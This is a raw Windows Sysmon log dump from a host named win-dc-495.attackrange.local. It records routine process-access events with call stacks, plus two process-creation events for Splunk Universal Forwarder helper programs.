14:02:48.028{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.028{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:48.028{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.028{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9508-6005-5105-00000000A301}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.028{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9508-6005-5105-00000000A301}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.029{59A5CD1D-9508-6005-5105-00000000A301}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:49.637{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9509-6005-5305-00000000A301}1716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:49.637{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:49.637{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:49.637{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:49.637{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:49.637{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9509-6005-5305-00000000A301}1716C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:49.637{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9509-6005-5305-00000000A301}1716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:49.638{59A5CD1D-9509-6005-5305-00000000A301}1716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.433{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000018607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:18.214{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.183{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:18.183{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.100{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:18.100{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.100{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:18.100{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.074{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-9526-6005-5505-00000000A301}6516C:\Windows\System32\InstallAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:18.074{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9526-6005-5505-00000000A301}6516C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:18.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 